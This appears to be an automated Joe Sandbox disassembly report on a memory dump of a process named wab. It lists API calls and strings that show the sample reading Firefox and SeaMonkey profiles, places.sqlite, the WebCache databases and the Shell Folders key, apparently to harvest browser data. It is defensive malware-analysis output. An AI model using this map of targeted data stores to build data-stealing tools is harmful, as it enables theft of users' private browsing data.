                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 00403FE1
                                                • memset.MSVCRT ref: 00403FF6
                                                • memset.MSVCRT ref: 0040400B
                                                • memset.MSVCRT ref: 00404020
                                                • memset.MSVCRT ref: 00404035
                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                • memset.MSVCRT ref: 004040FC
                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy
                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                • memset.MSVCRT ref: 004033B7
                                                • memcpy.MSVCRT ref: 004033D0
                                                • wcscmp.MSVCRT ref: 004033FC
                                                • _wcsicmp.MSVCRT ref: 00403439
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                • String ID: $0.@
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                • String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 00403C09
                                                • memset.MSVCRT ref: 00403C1E
                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                • wcscat.MSVCRT ref: 00403C47
                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                • wcscat.MSVCRT ref: 00403C70
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memsetwcscat$Closewcscpywcslen
                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 0040A824
                                                • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                • wcscpy.MSVCRT ref: 0040A854
                                                • wcscat.MSVCRT ref: 0040A86A
                                                • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                • String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • wcschr.MSVCRT ref: 00414458
                                                • _snwprintf.MSVCRT ref: 0041447D
                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                • String ID: "%s"
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProcProcessTimes
                                                • String ID: GetProcessTimes$kernel32.dll
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 004087D6
                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                • memset.MSVCRT ref: 00408828
                                                • memset.MSVCRT ref: 00408840
                                                • memset.MSVCRT ref: 00408858
                                                • memset.MSVCRT ref: 00408870
                                                • memset.MSVCRT ref: 00408888
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                • String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcmp
                                                • String ID: @ $SQLite format 3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                • memset.MSVCRT ref: 00414C87
                                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                • wcscpy.MSVCRT ref: 00414CFC
                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                Strings
                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressCloseProcVersionmemsetwcscpy
                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _wcsicmpqsort
                                                • String ID: /nosort$/sort
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 0040E60F
                                                • memset.MSVCRT ref: 0040E629
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                Strings
                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                • API String ID: 3354267031-2114579845
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Resource$FindLoadLockSizeof
                                                • String ID:
                                                • API String ID: 3473537107-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset
                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                • API String ID: 2221118986-1725073988
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Sleep.KERNEL32(00000064), ref: 004175D0
                                                • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ChangeCloseFindNotificationSleep
                                                • String ID: }A
                                                • API String ID: 1821831730-2138825249
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@DeleteObject
                                                • String ID: r!A
                                                • API String ID: 1103273653-628097481
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@
                                                • String ID:
                                                • API String ID: 1033339047-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                • memcmp.MSVCRT ref: 00444BA5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressProc$memcmp
                                                • String ID: $$8
                                                • API String ID: 2808797137-435121686
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • duplicate column name: %s, xrefs: 004307FE
                                                • too many columns on %s, xrefs: 00430763
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: duplicate column name: %s$too many columns on %s
                                                • API String ID: 0-1445880494
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                  • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                  • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                • String ID:
                                                • API String ID: 1042154641-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                • memset.MSVCRT ref: 00403A55
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                • String ID: history.dat$places.sqlite
                                                • API String ID: 3093078384-467022611
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                • GetLastError.KERNEL32 ref: 00417627
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ErrorLast$File$PointerRead
                                                • String ID:
                                                • API String ID: 839530781-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID: *.*$index.dat
                                                • API String ID: 1974802433-2863569691
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@mallocmemcpy
                                                • String ID:
                                                • API String ID: 3831604043-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                • GetLastError.KERNEL32 ref: 004175A2
                                                • GetLastError.KERNEL32 ref: 004175A8
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ErrorLast$FilePointer
                                                • String ID:
                                                • API String ID: 1156039329-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$ChangeCloseCreateFindNotificationTime
                                                • String ID:
                                                • API String ID: 1631957507-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                • String ID:
                                                • API String ID: 1125800050-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                • failed memory resize %u to %u bytes, xrefs: 00415358
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: realloc
                                                • String ID: failed memory resize %u to %u bytes
                                                • API String ID: 471065373-2134078882
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: d
                                                • API String ID: 0-2564639436

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset
                                                • String ID: BINARY
                                                • API String ID: 2221118986-907554435

                                                APIs
                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                • String ID:
                                                • API String ID: 1161345128-0

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _wcsicmp
                                                • String ID: /stext
                                                • API String ID: 2081463915-3817206916

                                                APIs
                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
